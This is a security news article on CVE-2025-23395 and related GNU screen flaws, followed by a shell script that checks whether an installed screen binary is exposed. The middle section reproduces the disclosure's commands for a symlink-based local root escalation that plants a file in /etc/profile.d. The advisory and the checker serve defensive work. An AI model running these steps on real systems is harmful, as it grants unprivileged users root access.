Five vulnerabilities have been disclosed in GNU screen, the console window manager (terminal multiplexer) that provides multiple sessions within a single console. The most severe of them, CVE-2025-23395, allows an unprivileged user to obtain root access on the system. A fix is included in the latest release, screen 5.0.1.
CVE-2025-23395 is specific to the screen 5.0.0 branch and affects systems where screen is installed with the setuid root bit set; this is the case on Fedora, Arch Linux, NetBSD, OpenBSD and Alpine, where the vulnerability can be exploited. The screen 4.x branch, which is still shipped by Debian, Ubuntu, RHEL (EPEL9), Gentoo, FreeBSD, SUSE/openSUSE and OpenWRT, is not affected. On Fedora the utility is installed with the setgid bit rather than setuid, granting only the rights of the screen group, which limits the attack surface.
The vulnerability arises because the logfile_reopen() function runs without dropping privileges when screen is started with root rights. The initial opening of the log file is done with privileges correctly dropped, but subsequent reopenings are performed as root. By manipulating the session output, an attacker can therefore write to arbitrary files with root privileges, even though the log file itself resides in the user's home directory.
The attack described in the disclosure creates the file /etc/profile.d/exploit.sh using the following steps:
- Create a screen session with logging to a file in the home directory: `$ screen -Logfile $HOME/screen.log`
- Press Ctrl-A H to turn on logging
- Delete the log file and replace it with a symbolic link pointing at the file to be created: `$ rm $HOME/screen.log; ln -s /etc/profile.d/exploit.sh $HOME/screen.log`
- Return to the screen session and print data to the terminal so that it is written to the log file: `$ echo -e "\nchown $USER /root;"`
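As an added defender-side check (not part of the advisory and not screen's own code), this POSIX sh snippet classifies a screen installation against the two conditions the article names: a 5.0.0 version string and a setuid (or, as on Fedora, setgid-only) binary. The sample `screen -v` strings are constructed in the format screen prints, and the BSD `stat` fallback is an assumption.

```shell
#!/bin/sh
# Added example, not from the advisory: decide whether an installed GNU screen
# matches the conditions for CVE-2025-23395 described above, i.e. a 5.0.0 build
# installed setuid root. Setgid-only installs (Fedora) and the 4.x branch are
# reported separately. Version strings used in tests are constructed samples.

# classify_screen "<screen -v output>" <octal mode of the binary>
# Prints one of: vulnerable | setgid-only | not-setuid | fixed | unaffected-branch | unknown-version
classify_screen() {
    ver=$(printf '%s\n' "$1" | sed -n 's/^Screen version \([0-9][0-9.]*\).*/\1/p')
    mode=$2
    [ -n "$ver" ] || { echo unknown-version; return 0; }

    # Special-bits digit: strip the three rwx digits, keep the last remaining
    # character ("4755" -> 4, "2755" -> 2, "755" -> empty -> 0).
    special=${mode%???}
    special=${special#"${special%?}"}
    [ -n "$special" ] || special=0

    case "$ver" in
        5.00.00|5.0.0) branch=affected ;;
        5.*)           branch=fixed ;;     # 5.0.1 and later carry the fix
        *)             branch=other ;;     # 4.x branch still shipped by many distros
    esac

    if [ "$branch" = fixed ]; then
        echo fixed
    elif [ "$branch" = other ]; then
        echo unaffected-branch
    else
        case "$special" in
            4|5|6|7) echo vulnerable ;;    # setuid bit set (6/7 = setuid and setgid)
            2|3)     echo setgid-only ;;   # screen group rights only, as on Fedora
            *)       echo not-setuid ;;
        esac
    fi
}

# Inspect the screen binary on this host (invoke the script with --live).
check_installed_screen() {
    bin=$(command -v screen 2>/dev/null) || { echo "screen: not installed"; return 0; }
    bin=$(readlink -f "$bin" 2>/dev/null || printf '%s' "$bin")         # resolve symlinks
    mode=$(stat -c '%a' "$bin" 2>/dev/null || stat -f '%Mp%Lp' "$bin")  # GNU stat, then BSD (assumed)
    ver=$("$bin" -v 2>&1 | head -n 1)
    printf '%s (%s, mode %s): %s\n' "$bin" "$ver" "$mode" "$(classify_screen "$ver" "$mode")"
}

case "${1:-}" in --live) check_installed_screen ;; esac
```

Run the script with `--live` to report the local binary; any result other than `vulnerable` means the privilege-escalation condition the article describes does not hold on that host.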